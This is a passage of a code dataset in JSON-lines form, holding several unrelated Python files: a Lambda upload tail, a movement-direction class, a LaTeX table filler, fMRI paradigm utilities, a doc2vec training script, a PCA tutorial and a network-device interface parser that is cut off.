s3.meta.client.upload_file(\n '/tmp/{0}'.format(filename),\n bucket,\n 'capital-nature/{0}'.format(filename)\n )\n return json.dumps(event_output, indent=2)\n\n\n# For local testing\nevent = {\n 'url': url,\n 'source_name': 'casey_trees'\n}\n# is_local = False\n# print(handler(event, {}))\n\n","sub_path":"lambdas/casey_trees/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":6636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"652166553","text":"\"\"\"\nAn object dedicated to reporting where an Entity is going.\n\"\"\"\n\n\nclass Direction:\n\n IS_GOING_UP, IS_GOING_RIGHT = 1, 1\n IS_GOING_DOWN, IS_GOING_LEFT = -1, -1\n IS_STILL = 0\n\n STILL = 1\n UP = 2\n DOWN = 3\n LEFT = 5\n RIGHT = 7\n UP_LEFT = UP * LEFT\n UP_RIGHT = UP * RIGHT\n DOWN_LEFT = DOWN * LEFT\n DOWN_RIGHT = DOWN * RIGHT\n\n __DIRECTIONS = [STILL, UP, DOWN, LEFT, RIGHT, UP_LEFT, UP_RIGHT, DOWN_LEFT, DOWN_RIGHT]\n __AXIS = [UP, DOWN, LEFT, RIGHT]\n\n __DIRECTIONS_TO_STRING = {\n STILL: \"still\",\n UP: \"up\",\n DOWN: \"down\",\n LEFT: \"left\",\n RIGHT: \"right\",\n UP_LEFT: \"up-left\",\n UP_RIGHT: \"up-right\",\n DOWN_LEFT: \"down-left\",\n DOWN_RIGHT: \"down-right\"\n }\n\n def __init__(self):\n self.__instance = self.STILL\n\n def changeDirection(self, new_direction):\n \"\"\"\n Override the current direction.\n :param new_direction: The new direction\n \"\"\"\n if new_direction not in self.__DIRECTIONS:\n self.__instance = self.STILL\n else:\n self.__instance = new_direction\n\n def turn(self, direction):\n \"\"\"\n Turn to the given direction. Only UP, DOWN, LEFT and RIGHT are value parameters.\n :param direction: The new direction\n \"\"\"\n if direction not in self.__AXIS or \\\n direction == self.STILL or \\\n self.isGoing(direction):\n return\n\n if direction == Direction.DOWN and self.isGoing(Direction.UP):\n self.__instance *= Direction.DOWN / Direction.UP\n elif direction == Direction.UP and self.isGoing(Direction.DOWN):\n self.__instance *= Direction.UP / Direction.DOWN\n elif direction == Direction.LEFT and self.isGoing(Direction.RIGHT):\n self.__instance *= Direction.LEFT / Direction.RIGHT\n elif direction == Direction.RIGHT and self.isGoing(Direction.LEFT):\n self.__instance *= Direction.RIGHT / Direction.LEFT\n else:\n self.__instance *= direction\n\n if self.__instance not in self.__DIRECTIONS:\n print(f\"{self.__instance} somehow happened\")\n self.__instance /= direction\n\n def goBack(self, direction):\n \"\"\"\n Stop going towards the given direction. Only UP, DOWN, LEFT and RIGHT are value parameters.\n :param direction: The old direction\n \"\"\"\n if direction not in self.__AXIS or \\\n direction == self.STILL or \\\n not self.isGoing(direction):\n return\n\n self.__instance /= direction\n\n if self.__instance not in self.__DIRECTIONS:\n print(f\"{self.__instance} somehow happened\")\n self.__instance /= direction\n\n # Getters\n\n def __str__(self):\n return \"\".format(self.__DIRECTIONS_TO_STRING[self.__instance],\n self.__instance)\n\n def verticalDirection(self):\n \"\"\"\n Returns whether the direction is pointing upwards, downwards or none\n :return: the vertical direction\n \"\"\"\n if self.isGoing(Direction.UP):\n return self.IS_GOING_UP\n elif self.isGoing(Direction.DOWN):\n return self.IS_GOING_DOWN\n else:\n return self.IS_STILL\n\n def horizontalDirection(self):\n \"\"\"\n Returns whether the direction is pointing right, left or none\n :return: the horizontal direction\n \"\"\"\n if self.isGoing(Direction.RIGHT):\n return self.IS_GOING_RIGHT\n elif self.isGoing(Direction.LEFT):\n return self.IS_GOING_LEFT\n else:\n return self.IS_STILL\n\n def isStill(self):\n \"\"\"\n Returns whether the direction is going nowhere\n :return: a boolean\n \"\"\"\n return self.__instance == Direction.STILL\n\n def value(self):\n return self.__instance\n\n def isGoing(self, direction):\n return self.__instance % direction == 0\n\n\nif __name__ == '__main__':\n d = Direction()\n\n d.turn(Direction.DOWN)\n d.turn(Direction.RIGHT)\n print(d)\n d.turn(Direction.LEFT)\n print(d)\n d.turn(Direction.LEFT)\n print(d)\n d.turn(Direction.UP)\n print(d)\n","sub_path":"objects/direction.py","file_name":"direction.py","file_ext":"py","file_size_in_byte":4333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"127855796","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# target_string: '\\cellcolor[rgb]{0.74,0.90,0.70}{}&\\cellcolor[rgb]{.7,.9,.9}4&\\cellcolor[rgb]{.8,.8,.9}5&\\cellcolor[rgb]{.8,.8,.9}5\\\\'\n\n\ncolor = ['FUCK', [188., 255., 255.], [222., 242., 217.], [255., 255., 255.], [254., 228., 211.], [253., 201., 168.]]\n\nt3_1_global_color = [1,5,2,3,1,1,1,1,1,1,1,1,1,1,1,4]\nt3_1_north_color = [2,2,5,1,3,1,1,1,4,1,5,1,1,1,1,2]\nt3_1_global_location = [\"非洲以南的海上\",\"斯里兰卡以西的海上\",\"印度洋中心\",\"印度洋中心\",\"中东地区里海北侧\",\"巴基斯坦北侧的乡下\",\"西藏自治区日喀则地区聂拉木县\",\"印度东侧曼尼普尔近锡尔杰尔\",\"印度洋北侧\",\"印度洋北侧\",\"新疆维吾尔自治区阿克苏地区沙雅县\",\"青海省海西蒙古族藏族自治州格尔木市\",\"非洲南侧\",\"非洲东南侧\",\"印度洋中心\",\"印度洋中心\"]\nt3_1_north_location = [\"孟买西侧阿拉伯海域\", \"马尔代夫西北方向阿拉伯海域\", \"斯里兰卡东南方向印度洋海域\", \"印度尼西亚棉兰\", \"舍甫琴柯堡西侧里海海域\", \"阿富汗中部地区\", \"西藏自治区日喀则地区吉隆县\", \"西藏自治区那曲地区那曲县\", \"马哈奇卡拉东侧里海海域\", \"塔吉克斯坦西南角\", \"新疆维吾尔自治区阿克苏地区沙雅县\", \"青海省海西蒙古族藏族自治州\", \"阿曼东侧阿拉伯海海域\", \"印度索姆纳特东侧\", \"印度金奈东侧阿拉伯海海域\", \"孟加拉湾安达曼群岛西侧\"]\n\nt3_2_global_color = [3, 2, 3, 1, 1, 1, 2, 1, 2, 2, 2, 1, 1, 1, 2, 1, 2, 2, 1, 1]\nt3_2_north_color = [1, 1, 1, 4, 1, 1, 1, 1, 1, 1, 1, 4, 1, 1, 4, 1, 3, 1, 1, 5]\nt3_2_global_location = [\"南极洲海岸边\", \"南极洲海岸边\", \"广西壮族自治区梧州市藤县321国道\", \"澳大利亚与大洋洲的中点\", \"印度洋南侧\", \"澳大利亚与大洋洲的中点\", \"俄罗斯外贝加尔边疆区\", \"澳大利亚西南侧\", \"澳大利亚西侧\", \"蒙古曼达勒敖包\", \"澳大利亚西南侧\", \"俄罗斯萨哈共和国\", \"澳大利亚西侧\", \"俄罗斯西伯利亚平原南侧\", \"俄罗斯与蒙古的国境线附近\", \"非洲南侧\", \"印度洋中心\", \"印度洋中心\", \"印度洋中心\", \"印度洋中心\"]\nt3_2_north_location = [\"蒙古巴彦德勒格尔\", \"湖南省益阳市桃江县\", \"湖南省永州市零陵区\", \"柬埔寨东北侧\", \"越南陆地最南端\", \"北冰洋中心\", \"俄罗斯西伯利亚平原中心\", \"蒙古共和国北侧\", \"蒙古共和国南侧\", \"内蒙古自治区阿拉善盟阿拉善左旗\", \"北冰洋中心\", \"俄罗斯西伯利亚平原北岸\", \"俄罗斯西伯利亚平原中部\", \"蒙古共和国与俄罗斯国境线北侧\", \"蒙古共和国与俄罗斯国境线北侧\", \"蒙古共和国乌兰巴托\", \"内蒙古自治区巴彦淖尔市乌拉特中旗呼四线\", \"内蒙古自治区鄂尔多斯市鄂托克前旗上海街\", \"云南省楚雄彝族自治州禄丰县\", \"云南省临沧市云县漫湾镇嘎止村\"]\n\nstarter = '\\cellcolor[rgb]{.9,.9,.9}$%d\\sim%d$ &'\ncell = '\\cellcolor[rgb]{%.2f,%.2f,%.2f}{%s}'\nender = '\\\\\\\\\\n'\n\nout = open('latex.txt', 'w')\n\ndef cell_filler(c, s):\n\treturn cell % (color[c][0]/255, color[c][1]/255, color[c][2]/255, s)\n\nfor Lg_min in xrange(5):\n\tout.write(starter % (Lg_min*1.5, (Lg_min+1)*1.5,))\n\tfor i in xrange(4):\n\t\tout.write(cell_filler(t3_2_north_color[i*4 + Lg_min], t3_2_north_location[i*4 + Lg_min]))\n\t\tif i != 3:\n\t\t\tout.write('&')\n\tout.write(ender)\n","sub_path":"latex_table_filler.py","file_name":"latex_table_filler.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"16345090","text":"\"\"\"\nSome utils too deal with peculiar protocols or peculiar ways of handling them\n\nAuthor: Bertrand Thirion, Ana Luisa Grilo Pinho, 2015\n\"\"\"\nimport numpy as np\nfrom pandas import read_csv, concat\n\n\nrsvp_language = ['consonant_strings', 'word_list', 'pseudoword_list',\n 'jabberwocky', 'simple_sentence', 'probe','complex_sentence']\narchi_social = [\n 'false_belief_video', 'non_speech', 'speech', 'mechanistic_audio',\n 'mechanistic_video', 'false_belief_audio', 'triangle_intention',\n 'triangle_random',]\n\nrelevant_conditions = {\n 'emotional': ['Face', 'Shape'],\n 'gambling': ['Reward', 'Punishment', 'Neutral'],\n 'hcp_language': ['math', 'story'],\n 'motor': ['LeftHand', 'RightHand', 'LeftFoot', 'RightFoot',\n 'Cue', 'Tongue'],\n 'relational': ['Relational', 'Cue', 'Control'],\n 'social': ['Mental', 'Response', 'Random'],\n 'wm': ['2-BackBody', '0-BackBody', '2-BackFace', '0-BackFace',\n '2-BackTools', '0-BackTools', '0-BackPlace', '2-BackPlace'],\n 'archi_social': archi_social,\n 'language_00': rsvp_language,\n 'language_01': rsvp_language,\n 'language_02': rsvp_language,\n 'language_03': rsvp_language,\n 'language_04': rsvp_language,\n 'language_05': rsvp_language\n }\n\n\ndef post_process(df, paradigm_id):\n language_paradigms = ['language_%02d' % i for i in range(6)] +\\\n ['rsvp-language', 'language_']\n if paradigm_id in language_paradigms:\n targets = ['complex_sentence_objrel',\n 'complex_sentence_objclef',\n 'complex_sentence_subjrel']\n for target in targets:\n df = df.replace(target, 'complex_sentence')\n targets = ['simple_sentence_cvp',\n 'simple_sentence_adj',\n 'simple_sentence_coord']\n for target in targets:\n df = df.replace(target, 'simple_sentence')\n\n # df.onset *= .001\n # df.duration = 3 * np.ones(len(df.duration))\n if paradigm_id == 'hcp_motor':\n df = df.replace('right_foot_cue', 'cue')\n df = df.replace('left_foot_cue', 'cue')\n df = df.replace('right_hand_cue', 'cue')\n df = df.replace('left_hand_cue', 'cue')\n df = df.replace('tongue_cue', 'cue')\n\n if paradigm_id in relevant_conditions.keys():\n relevant_items = relevant_conditions[paradigm_id]\n condition = np.array(\n [df.trial_type == r for r in relevant_items]).sum(0).astype(np.bool)\n df = df[condition]\n\n if paradigm_id[:10] == 'preference':\n domain = paradigm_id[11:]\n if domain[-1] == 's':\n domain = domain[:-1]\n #\n mean = df[df.trial_type == domain]['score'].mean()\n df['modulation'] = df['score'] - mean\n df = df.fillna(1)\n # add a regressor with constant values\n df2 = df[df.trial_type == domain]\n df2.modulation = np.ones_like(df2.modulation)\n df2.trial_type = '%s_constant' % domain\n # add quadratic regressor\n df3 = df[df.trial_type == domain]\n df3.modulation = df.modulation ** 2\n df3.modulation = df3.modulation - df3.modulation.mean()\n df3.trial_type = '%s_quadratic' % domain\n df = df.replace(domain, '%s_linear' % domain)\n df = concat([df, df2, df3], axis=0, ignore_index=True)\n\n responses_we = ['response_we_east_present_space_close',\n 'response_we_west_present_space_far',\n 'response_we_center_past_space_far',\n 'response_we_west_present_time_close',\n 'response_we_east_present_time_far',\n 'response_we_center_past_space_close',\n 'response_we_center_present_space_close',\n 'response_we_center_present_space_far',\n 'response_we_center_present_time_far',\n 'response_we_east_present_time_close',\n 'response_we_center_past_time_close',\n 'response_we_center_past_time_far',\n 'response_we_east_present_space_far',\n 'response_we_center_future_time_far',\n 'response_we_center_future_time_far',\n 'response_we_center_future_time_close',\n 'response_we_west_present_space_close',\n 'response_we_center_present_time_close',\n 'response_we_center_present_time_close',\n 'response_we_center_future_space_far',\n 'response_we_center_future_space_close',\n 'response_we_west_present_time_far']\n\n if paradigm_id == 'IslandWE':\n for response in responses_we:\n df = df.replace(response, 'response')\n\n responses_sn = ['response_sn_north_present_space_far',\n 'response_sn_south_present_time_close',\n 'response_sn_center_present_space_close',\n 'response_sn_south_present_time_far',\n 'response_sn_center_future_space_close',\n 'response_sn_center_past_space_close',\n 'response_sn_north_present_time_close',\n 'response_sn_center_past_space_far',\n 'response_sn_south_present_space_close',\n 'response_sn_center_present_time_far',\n 'response_sn_center_past_time_far',\n 'response_sn_center_future_space_far',\n 'response_sn_center_future_space_far',\n 'response_sn_center_future_time_close',\n 'response_sn_center_past_time_close',\n 'response_sn_north_present_time_far',\n 'response_sn_south_present_space_far',\n 'response_sn_center_present_time_close',\n 'response_sn_north_present_space_close',\n 'response_sn_center_present_space_far',\n 'response_sn_center_future_time_far',\n 'response_sn_center_future_time_far',]\n\n if paradigm_id == 'IslandNS':\n for response in responses_sn:\n df = df.replace(response, 'response')\n\n if paradigm_id == 'enum':\n for i in range(1, 9):\n df = df.replace('memorization_num_%d' % i, 'response_num_%d' % i)\n if paradigm_id == 'VSTM':\n for i in range(1, 7):\n df = df.replace('memorization_num_%d' % i, 'response_num_%d' % i)\n\n instructions = ['Ins_bouche', 'Ins_index', 'Ins_jambe',\n 'Ins_main', 'Ins_repos', 'Ins_yeux', ]\n if paradigm_id == 'lyon_moto':\n for instruction in instructions:\n df = df.replace(instruction, 'instructions')\n df = df.replace('sacaade_right', 'saccade_right')\n df = df.replace('sacaade_left', 'saccade_left')\n # df = df.replace('Bfix', 'fixation')\n df = df[df.trial_type != 'Bfix']\n\n if paradigm_id == 'lyon_mcse':\n df = df[df.trial_type != 'Bfix']\n\n if paradigm_id == 'lyon_mvis':\n df = df[df.trial_type != 'grid']\n df = df[df.trial_type != 'Bfix']\n df = df[df.trial_type != 'maintenance']\n\n if paradigm_id == 'lyon_mveb':\n df = df[df.trial_type != 'cross']\n df = df[df.trial_type != 'blank2']\n\n if paradigm_id == 'audio':\n voices = ['voice_%d' % i for i in range(60)]\n musics = ['music_%d' % i for i in range(60)]\n animals = ['animal_%d' % i for i in range(60)]\n speeches = ['speech_%d' % i for i in range(60)]\n natures = ['nature_%d' % i for i in range(60)]\n tools = ['tools_%d' % i for i in range(60)]\n for voice in voices:\n df = df.replace(voice, 'voice')\n for animal in animals:\n df = df.replace(animal, 'animal')\n for music in musics:\n df = df.replace(music, 'music')\n for speech in speeches:\n df = df.replace(speech, 'speech')\n for nature in natures:\n df = df.replace(nature, 'nature')\n for tool in tools:\n df = df.replace(tool, 'tool')\n return df\n\n\ndef make_paradigm(onset_file, paradigm_id=None):\n \"\"\" Temporary fix \"\"\"\n if paradigm_id in ['wedge_clock', 'wedge_anti', 'cont_ring', 'exp_ring']:\n return None\n df = read_csv(onset_file, index_col=None, sep='\\t')\n if 'onset' not in df.keys() and 'Onsets' in df.keys():\n df['onset'] = df['Onsets']\n df.drop('Onsets', 1, inplace=True)\n if 'duration' not in df.keys() and 'Durations' in df.keys():\n df['duration'] = df['Durations']\n df.drop('Durations', 1, inplace=True)\n if 'trial_type' not in df.keys() and 'Conditions' in df.keys():\n df['trial_type'] = df['Conditions']\n df.drop('Conditions', 1, inplace=True)\n if 'onset' not in df.keys() and 'Onset' in df.keys():\n df['onset'] = df['Onset']\n df.drop('Onset', 1, inplace=True)\n if 'duration' not in df.keys() and 'Duration' in df.keys():\n df['duration'] = df['Duration']\n df.drop('Duration', 1, inplace=True)\n if 'trial_type' not in df.keys() and 'Condition' in df.keys():\n df['trial_type'] = df['Condition']\n df.drop('Condition', 1, inplace=True)\n if 'trial_type' not in df.keys() and 'name' in df.keys():\n df['trial_type'] = df['name']\n df.drop('name', 1, inplace=True)\n df = post_process(df, paradigm_id)\n df['name'] = df['trial_type']\n return df\n","sub_path":"ibc_public/utils_paradigm.py","file_name":"utils_paradigm.py","file_ext":"py","file_size_in_byte":9434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"405984742","text":"import sys\naaa=str(sys.argv[1]).strip()\n\ndef read_data(filename):\n with open(filename, 'r') as f:\n data = [line.split('\\t') for line in f.read().splitlines()]\n data = data[1:] # header 제외\n return data\ntrain_data = read_data('./trainset/'+aaa+'.txt')\n\n\nprint(len(train_data)) # nrows: 150000\nprint(len(train_data[0]))\n\nfrom konlpy.tag import Twitter\npos_tagger = Twitter()\ndef tokenize(doc):\n # norm, stem은 optional\n return ['/'.join(t) for t in pos_tagger.pos(doc, norm=True, stem=True)]\ntrain_docs=list()\nfor row in train_data:\n\ttry:\n\t\ttrain_docs.append((tokenize(row[1]), row[2]))\n\texcept:\n\t\tcontinue\n#train_docs = [(tokenize(row[1]), row[2]) for row in train_data]\n\nfrom pprint import pprint\npprint(train_docs[0])\n\nfrom collections import namedtuple\nTaggedDocument = namedtuple('TaggedDocument', 'words tags')\ntagged_train_docs = [TaggedDocument(d, [c]) for d, c in train_docs]\n\nfrom gensim.models import doc2vec\n# 사전 구축\ndoc_vectorizer = doc2vec.Doc2Vec(size=300, alpha=0.025, min_alpha=0.025, seed=1234)\ndoc_vectorizer.build_vocab(tagged_train_docs)\n# Train document vectors!\nfor epoch in range(100):\n print (epoch)\n doc_vectorizer.train(tagged_train_docs)\n doc_vectorizer.alpha -= 0.002 # decrease the learning rate\n doc_vectorizer.min_alpha = doc_vectorizer.alpha # fix the learning rate, no decay\n# To save\ndoc_vectorizer.save('./model/'+aaa+'.model')\n\n\n\n\npprint(doc_vectorizer.most_similar('중간고사/Noun'))\n","sub_path":"Trend/learn/2_doc2vec_learn.py","file_name":"2_doc2vec_learn.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"53836985","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 16 16:55:19 2015\n\n@author: kartiks\nhttp://sebastianraschka.com/Articles/2014_pca_step_by_step.html\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom mpl_toolkits.mplot3d import proj3d\nfrom matplotlib.patches import FancyArrowPatch\nfrom matplotlib.mlab import PCA as mlabPCA\nfrom sklearn.decomposition import PCA as sklearnPCA\n\n\nclass Arrow3D(FancyArrowPatch):\n def __init__(self, xs, ys, zs, *args, **kwargs):\n FancyArrowPatch.__init__(self, (0,0), (0,0), *args, **kwargs)\n self._verts3d = xs, ys, zs\n\n def draw(self, renderer):\n xs3d, ys3d, zs3d = self._verts3d\n xs, ys, zs = proj3d.proj_transform(xs3d, ys3d, zs3d, renderer.M)\n self.set_positions((xs[0],ys[0]),(xs[1],ys[1]))\n FancyArrowPatch.draw(self, renderer)\n\n\n\n\n\nnp.random.seed(4294967295) # random seed for consistency\n\n# A reader pointed out that Python 2.7 would raise a\n# \"ValueError: object of too small depth for desired array\".\n# This can be avoided by choosing a smaller random seed, e.g. 1\n# or by completely omitting this line, since I just used the random seed for\n# consistency.\n\nmu_vec1 = np.array([0,0,0])\ncov_mat1 = np.array([[1,0,0],[0,1,0],[0,0,1]])\nclass1_sample = np.random.multivariate_normal(mu_vec1, cov_mat1, 20).T\nassert class1_sample.shape == (3,20), \"The matrix has not the dimensions 3x20\"\n\nmu_vec2 = np.array([1,1,1])\ncov_mat2 = np.array([[1,0,0],[0,1,0],[0,0,1]])\nclass2_sample = np.random.multivariate_normal(mu_vec2, cov_mat2, 20).T\nassert class1_sample.shape == (3,20), \"The matrix has not the dimensions 3x20\"\n\n#Plot the data\nfig = plt.figure(figsize=(8,8))\nax = fig.add_subplot(111, projection='3d')\nplt.rcParams['legend.fontsize'] = 10\nax.plot(class1_sample[0,:], class1_sample[1,:],\\\n class1_sample[2,:], 'o', markersize=8, color='blue', alpha=0.5, label='class1')\nax.plot(class2_sample[0,:], class2_sample[1,:],\\\n class2_sample[2,:], '^', markersize=8, alpha=0.5, color='red', label='class2')\n\nplt.title('Samples for class 1 and class 2')\nax.legend(loc='upper right')\nplt.show()\n\n\n# merge the samples into a single 3 X 40 dimensional array\nall_samples = np.concatenate((class1_sample, class2_sample), axis=1)\nassert all_samples.shape == (3,40), \"The matrix has not the dimensions 3x40\"\n\n\n# Caluclate the mean vector\nmean_x = np.mean(all_samples[0,:])\nmean_y = np.mean(all_samples[1,:])\nmean_z = np.mean(all_samples[2,:])\n\nmean_vector = np.array([[mean_x],[mean_y],[mean_z]])\n\nprint('Mean Vector:\\n', mean_vector)\n\n\n#compute the Scatter Matrix\nscatter_matrix = np.zeros((3,3))\nfor i in range(all_samples.shape[1]):\n scatter_matrix += (all_samples[:,i].reshape(3,1)\\\n - mean_vector).dot((all_samples[:,i].reshape(3,1) - mean_vector).T)\nprint('Scatter Matrix:\\n', scatter_matrix)\n\n#compute the Covariance Matrix\ncov_mat = np.cov([all_samples[0,:],all_samples[1,:],all_samples[2,:]])\nprint('Covariance Matrix:\\n', cov_mat)\n\n\n#Computing eigenvectors and corresponding eigenvalues\n# eigenvectors and eigenvalues for the from the scatter matrix\neig_val_sc, eig_vec_sc = np.linalg.eig(scatter_matrix)\n\n# eigenvectors and eigenvalues for the from the covariance matrix\neig_val_cov, eig_vec_cov = np.linalg.eig(cov_mat)\n\nfor i in range(len(eig_val_sc)):\n eigvec_sc = eig_vec_sc[:,i].reshape(1,3).T\n eigvec_cov = eig_vec_cov[:,i].reshape(1,3).T\n assert eigvec_sc.all() == eigvec_cov.all(), 'Eigenvectors are not identical'\n\n print('Eigenvector {}: \\n{}'.format(i+1, eigvec_sc))\n print('Eigenvalue {} from scatter matrix: {}'.format(i+1, eig_val_sc[i]))\n print('Eigenvalue {} from covariance matrix: {}'.format(i+1, eig_val_cov[i]))\n print('Scaling factor: ', eig_val_sc[i]/eig_val_cov[i])\n print(40 * '-')\n \n \n# checking the eigen Vector-Eigen Value Caculation\n \nfor i in range(len(eig_val_sc)):\n eigv = eig_vec_sc[:,i].reshape(1,3).T\n np.testing.assert_array_almost_equal(scatter_matrix.dot(eigv),\\\n eig_val_sc[i] * eigv, decimal=6,\\\n err_msg='', verbose=True)\n \n \n#Visualizing the eigenvectors\nfig = plt.figure(figsize=(7,7))\nax = fig.add_subplot(111, projection='3d')\n\nax.plot(all_samples[0,:], all_samples[1,:],\\\n all_samples[2,:], 'o', markersize=8, color='green', alpha=0.2)\nax.plot([mean_x], [mean_y], [mean_z], 'o', \\\n markersize=10, color='red', alpha=0.5)\nfor v in eig_vec_sc.T:\n a = Arrow3D([mean_x, v[0]], [mean_y, v[1]],\\\n [mean_z, v[2]], mutation_scale=20, lw=3, arrowstyle=\"-|>\", color=\"r\")\n ax.add_artist(a)\nax.set_xlabel('x_values')\nax.set_ylabel('y_values')\nax.set_zlabel('z_values')\n\nplt.title('Eigenvectors')\n\nplt.show() \n\n\n# Verify Eigen vectors are unit vectors\nfor ev in eig_vec_sc:\n np.testing.assert_array_almost_equal(1.0, np.linalg.norm(ev))\n # instead of 'assert' because of rounding errors\n\n\n# sort the eigen vectors\n# Make a list of (eigenvalue, eigenvector) tuples\neig_pairs = [(np.abs(eig_val_sc[i]), eig_vec_sc[:,i]) for i in range(len(eig_val_sc))]\n\n# Sort the (eigenvalue, eigenvector) tuples from high to low\neig_pairs.sort()\neig_pairs.reverse()\n\n# Visually confirm that the list is correctly sorted by decreasing eigenvalues\nfor i in eig_pairs:\n print(i[0])\n \n\n\n# Tramsforming the sample into the subspace\nmatrix_w = np.hstack((eig_pairs[0][1].reshape(3,1), eig_pairs[1][1].reshape(3,1)))\nprint('Matrix W:\\n', matrix_w)\ntransformed = matrix_w.T.dot(all_samples)\nassert transformed.shape == (2,40), \"The matrix is not 2x40 dimensional.\"\n\n\nplt.plot(transformed[0,0:20], transformed[1,0:20],\\\n 'o', markersize=7, color='blue', alpha=0.5, label='class1')\nplt.plot(transformed[0,20:40], transformed[1,20:40],\n '^', markersize=7, color='red', alpha=0.5, label='class2')\nplt.xlim([-4,4])\nplt.ylim([-4,4])\nplt.xlabel('x_values')\nplt.ylabel('y_values')\nplt.legend()\nplt.title('Transformed samples with class labels')\n\nplt.show()\n\n#Using the PCA() class from the matplotlib.mlab library\n\nmlab_pca = mlabPCA(all_samples.T)\n\nprint('PC axes in terms of the measurement axes'\\\n ' scaled by the standard deviations:\\n',\\\n mlab_pca.Wt)\n\nplt.plot(mlab_pca.Y[0:20,0],mlab_pca.Y[0:20,1], 'o', markersize=7,\\\n color='blue', alpha=0.5, label='class1')\nplt.plot(mlab_pca.Y[20:40,0], mlab_pca.Y[20:40,1], '^', markersize=7,\\\n color='red', alpha=0.5, label='class2')\n\nplt.xlabel('x_values')\nplt.ylabel('y_values')\nplt.xlim([-4,4])\nplt.ylim([-4,4])\nplt.legend()\nplt.title('Transformed samples with class labels from matplotlib.mlab.PCA()')\n\nplt.show()\n\n#Using the PCA() class from the sklearn.decomposition library to confirm our results\n\nsklearn_pca = sklearnPCA(n_components=2)\nsklearn_transf = sklearn_pca.fit_transform(all_samples.T)\n\nplt.plot(sklearn_transf[0:20,0],sklearn_transf[0:20,1],\\\n 'o', markersize=7, color='blue', alpha=0.5, label='class1')\nplt.plot(sklearn_transf[20:40,0], sklearn_transf[20:40,1],\\\n '^', markersize=7, color='red', alpha=0.5, label='class2')\n\nplt.xlabel('x_values')\nplt.ylabel('y_values')\nplt.xlim([-4,4])\nplt.ylim([-4,4])\nplt.legend()\nplt.title('Transformed samples with class labels from sklearn.decomposition.PCA()')\n\nplt.show()","sub_path":"Spring2015/HW-Lesson6-PCA.py","file_name":"HW-Lesson6-PCA.py","file_ext":"py","file_size_in_byte":7190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"606604713","text":"\n\n#calss header\nclass _HOIST():\n\tdef __init__(self,): \n\t\tself.name = \"HOIST\"\n\t\tself.definitions = [u'to lift something heavy, sometimes using ropes or a machine: ', u'to raise a flag to the top of a pole using a rope']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_hoist.py","file_name":"_hoist.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"559055047","text":"# ---------------------------------------------------------------------\n# Upvel.UP.get_interfaces\n# ---------------------------------------------------------------------\n# Copyright (C) 2007-2019 The NOC Project\n# See LICENSE for details\n# ---------------------------------------------------------------------\n\n# Python modules\nimport re\n\n# NOC modules\nfrom noc.core.script.base import BaseScript\nfrom noc.sa.interfaces.igetinterfaces import IGetInterfaces\nfrom noc.core.text import parse_table\n\n\nclass Script(BaseScript):\n name = \"Upvel.UP.get_interfaces\"\n interface = IGetInterfaces\n\n rx_stp = re.compile(r\"^(?P(?:Gi|2.5G|10G) \\S+)\\s+\", re.MULTILINE)\n rx_ctp = re.compile(\n r\"^(?P(?:Gi|2.5G|10G)\\S+ \\S+)\\s*\\n\" r\"^\\-+\\s*\\n\" r\"^\\s+Loop protect mode is enabled\",\n re.MULTILINE,\n )\n rx_oam = re.compile(\n r\"^(?P(?:Gi|2.5G|10G)\\S+)\\s+(?P\\S+)\\s+enabled\", re.MULTILINE\n )\n rx_switchport = re.compile(\n r\"^Name: (?P(?:Gi|2.5G|10G)\\S+ \\S+)\\s*\\n\"\n r\"^Administrative mode: (?P\\S+)\\s*\\n\"\n r\"^Access Mode VLAN: (?P\\d+)\\s*\\n\"\n r\"^Trunk Native Mode VLAN: (?P\\d+)\\s*\\n\"\n r\"^Administrative Native VLAN tagging: \\S+\\s*\\n\"\n r\"(^VLAN Trunking: \\S+\\s*\\n)?\"\n r\"^Allowed VLANs:(?P.*)\\n\",\n re.MULTILINE,\n )\n rx_vlan = re.compile(r\"^\\s*(?:VLAN )?(?P\\d+)\\s+\", re.MULTILINE)\n rx_hybrid_vlan = re.compile(r\"^Hybrid Native Mode VLAN: (?P\\d+)\", re.MULTILINE)\n rx_link = re.compile(\n r\"^\\s*LINK: (?P\\S+) Mtu:(?P\\d+) \\<(?P.+?)\\>\", re.MULTILINE\n )\n rx_ipv4 = re.compile(r\"^\\s+IPv4:\\s+(?P\\S+)\", re.MULTILINE)\n rx_ipv6 = re.compile(r\"^\\s+IPv6:\\s+(?P\\S+)\", re.MULTILINE)\n\n def get_gvrp(self):\n \"\"\"\n Do not works !!! Need mor examples !!!\n\n try:\n v = self.cli(\"show gvrp protocol-state interface *\")\n if \"GVRP Feature is currently Disabled\" not in v:\n return self.rx_enabled.findall(v)\n except self.CLISyntaxError:\n return []\n \"\"\"\n return []\n\n def get_stp(self):\n try:\n r = []\n v = self.cli(\"show spanning-tree\", cached=True)\n for match in self.rx_stp.finditer(v):\n r += [self.profile.convert_interface_name(match.group(\"port\"))]\n return r\n except self.CLISyntaxError:\n return []\n\n def get_ctp(self):\n try:\n v = self.cli(\"show loop-protect\")\n if \"Loop Protection : Enable\" in v:\n return self.rx_ctp.findall(v)\n except self.CLISyntaxError:\n return []\n return []\n\n def get_oam(self):\n try:\n r = []\n v = self.cli(\"show link-oam\", cached=True)\n for match in self.rx_oam.finditer(v):\n r += [match.group(\"port\") + \" \" + 